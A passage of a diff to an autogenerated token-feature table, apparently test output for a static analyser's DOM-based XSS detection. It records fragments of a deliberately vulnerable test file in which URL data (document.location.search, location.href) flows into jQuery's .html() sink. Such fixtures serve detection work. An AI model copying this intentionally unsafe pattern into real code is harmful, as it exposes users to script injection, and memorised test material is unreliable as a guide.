URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:374:3:374:24 | exceptional return of $('myId ... target) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:374:3:374:24 | exceptional return of $('myId ... target) | enclosingFunctionBody | target document location search $ myId html target $ myid html document 0 location href split ? 0 | +| autogenerated/Xss/DomBasedXss/tst.js:374:3:374:24 | exceptional return of $('myId ... target) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:374:3:374:24 | exceptional return of $('myId ... target) | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:374:5:374:10 | 'myId' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/tst.js:374:5:374:10 | 'myId' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:374:5:374:10 | 'myId' | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17352,6 +120765,11 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:374:5:374:10 | 'myId' | enclosingFunctionBody | target document location search $ myId html target $ myid html document 0 location href split ? 0 | | autogenerated/Xss/DomBasedXss/tst.js:374:5:374:10 | 'myId' | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/tst.js:374:5:374:10 | 'myId' | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:374:13:374:16 | html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:374:13:374:16 | html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:374:13:374:16 | html | enclosingFunctionBody | target document location search $ myId html target $ myid html document 0 location href split ? 0 | +| autogenerated/Xss/DomBasedXss/tst.js:374:13:374:16 | html | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:374:13:374:16 | html | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:374:18:374:23 | target | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/DomBasedXss/tst.js:374:18:374:23 | target | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:374:18:374:23 | target | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17359,6 +120777,36 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:374:18:374:23 | target | enclosingFunctionBody | target document location search $ myId html target $ myid html document 0 location href split ? 0 | | autogenerated/Xss/DomBasedXss/tst.js:374:18:374:23 | target | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/tst.js:374:18:374:23 | target | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:377:3:377:3 | $ | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:377:3:377:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:377:3:377:3 | $ | enclosingFunctionBody | target document location search $ myId html target $ myid html document 0 location href split ? 0 | +| autogenerated/Xss/DomBasedXss/tst.js:377:3:377:3 | $ | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:377:3:377:3 | $ | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:377:3:377:11 | $('myid') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:377:3:377:11 | $('myid') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:377:3:377:11 | $('myid') | enclosingFunctionBody | target document location search $ myId html target $ myid html document 0 location href split ? 0 | +| autogenerated/Xss/DomBasedXss/tst.js:377:3:377:11 | $('myid') | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:377:3:377:11 | $('myid') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:377:3:377:11 | exceptional return of $('myid') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:377:3:377:11 | exceptional return of $('myid') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:377:3:377:11 | exceptional return of $('myid') | enclosingFunctionBody | target document location search $ myId html target $ myid html document 0 location href split ? 0 | +| autogenerated/Xss/DomBasedXss/tst.js:377:3:377:11 | exceptional return of $('myid') | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:377:3:377:11 | exceptional return of $('myid') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:377:3:377:16 | $('myid').html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:377:3:377:16 | $('myid').html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:377:3:377:16 | $('myid').html | enclosingFunctionBody | target document location search $ myId html target $ myid html document 0 location href split ? 0 | +| autogenerated/Xss/DomBasedXss/tst.js:377:3:377:16 | $('myid').html | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:377:3:377:16 | $('myid').html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:377:3:377:54 | $('myid ... ?")[0]) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:377:3:377:54 | $('myid ... ?")[0]) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:377:3:377:54 | $('myid ... ?")[0]) | enclosingFunctionBody | target document location search $ myId html target $ myid html document 0 location href split ? 0 | +| autogenerated/Xss/DomBasedXss/tst.js:377:3:377:54 | $('myid ... ?")[0]) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:377:3:377:54 | $('myid ... ?")[0]) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:377:3:377:54 | exceptional return of $('myid ... ?")[0]) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:377:3:377:54 | exceptional return of $('myid ... ?")[0]) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:377:3:377:54 | exceptional return of $('myid ... ?")[0]) | enclosingFunctionBody | target document location search $ myId html target $ myid html document 0 location href split ? 0 | +| autogenerated/Xss/DomBasedXss/tst.js:377:3:377:54 | exceptional return of $('myid ... ?")[0]) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:377:3:377:54 | exceptional return of $('myid ... ?")[0]) | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:377:5:377:10 | 'myid' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/tst.js:377:5:377:10 | 'myid' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:377:5:377:10 | 'myid' | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17366,6 +120814,41 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:377:5:377:10 | 'myid' | enclosingFunctionBody | target document location search $ myId html target $ myid html document 0 location href split ? 0 | | autogenerated/Xss/DomBasedXss/tst.js:377:5:377:10 | 'myid' | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/tst.js:377:5:377:10 | 'myid' | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:377:13:377:16 | html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:377:13:377:16 | html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:377:13:377:16 | html | enclosingFunctionBody | target document location search $ myId html target $ myid html document 0 location href split ? 0 | +| autogenerated/Xss/DomBasedXss/tst.js:377:13:377:16 | html | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:377:13:377:16 | html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:377:18:377:25 | document | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:377:18:377:25 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:377:18:377:25 | document | enclosingFunctionBody | target document location search $ myId html target $ myid html document 0 location href split ? 0 | +| autogenerated/Xss/DomBasedXss/tst.js:377:18:377:25 | document | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:377:18:377:25 | document | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:377:18:377:34 | document.location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:377:18:377:34 | document.location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:377:18:377:34 | document.location | enclosingFunctionBody | target document location search $ myId html target $ myid html document 0 location href split ? 0 | +| autogenerated/Xss/DomBasedXss/tst.js:377:18:377:34 | document.location | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:377:18:377:34 | document.location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:377:18:377:39 | documen ... on.href | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:377:18:377:39 | documen ... on.href | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:377:18:377:39 | documen ... on.href | enclosingFunctionBody | target document location search $ myId html target $ myid html document 0 location href split ? 0 | +| autogenerated/Xss/DomBasedXss/tst.js:377:18:377:39 | documen ... on.href | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:377:18:377:39 | documen ... on.href | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:377:18:377:45 | documen ... f.split | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:377:18:377:45 | documen ... f.split | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:377:18:377:45 | documen ... f.split | enclosingFunctionBody | target document location search $ myId html target $ myid html document 0 location href split ? 0 | +| autogenerated/Xss/DomBasedXss/tst.js:377:18:377:45 | documen ... f.split | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:377:18:377:45 | documen ... f.split | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:377:18:377:50 | documen ... it("?") | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:377:18:377:50 | documen ... it("?") | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:377:18:377:50 | documen ... it("?") | enclosingFunctionBody | target document location search $ myId html target $ myid html document 0 location href split ? 0 | +| autogenerated/Xss/DomBasedXss/tst.js:377:18:377:50 | documen ... it("?") | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:377:18:377:50 | documen ... it("?") | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:377:18:377:50 | exceptional return of documen ... it("?") | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:377:18:377:50 | exceptional return of documen ... it("?") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:377:18:377:50 | exceptional return of documen ... it("?") | enclosingFunctionBody | target document location search $ myId html target $ myid html document 0 location href split ? 0 | +| autogenerated/Xss/DomBasedXss/tst.js:377:18:377:50 | exceptional return of documen ... it("?") | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:377:18:377:50 | exceptional return of documen ... it("?") | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:377:18:377:53 | documen ... "?")[0] | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/DomBasedXss/tst.js:377:18:377:53 | documen ... "?")[0] | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:377:18:377:53 | documen ... "?")[0] | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17373,6 +120856,21 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:377:18:377:53 | documen ... "?")[0] | enclosingFunctionBody | target document location search $ myId html target $ myid html document 0 location href split ? 0 | | autogenerated/Xss/DomBasedXss/tst.js:377:18:377:53 | documen ... "?")[0] | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/tst.js:377:18:377:53 | documen ... "?")[0] | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:377:27:377:34 | location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:377:27:377:34 | location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:377:27:377:34 | location | enclosingFunctionBody | target document location search $ myId html target $ myid html document 0 location href split ? 0 | +| autogenerated/Xss/DomBasedXss/tst.js:377:27:377:34 | location | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:377:27:377:34 | location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:377:36:377:39 | href | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:377:36:377:39 | href | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:377:36:377:39 | href | enclosingFunctionBody | target document location search $ myId html target $ myid html document 0 location href split ? 0 | +| autogenerated/Xss/DomBasedXss/tst.js:377:36:377:39 | href | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:377:36:377:39 | href | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:377:41:377:45 | split | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:377:41:377:45 | split | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:377:41:377:45 | split | enclosingFunctionBody | target document location search $ myId html target $ myid html document 0 location href split ? 0 | +| autogenerated/Xss/DomBasedXss/tst.js:377:41:377:45 | split | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:377:41:377:45 | split | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:377:47:377:49 | "?" | CalleeFlexibleAccessPath | document.location.href.split | | autogenerated/Xss/DomBasedXss/tst.js:377:47:377:49 | "?" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:377:47:377:49 | "?" | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, 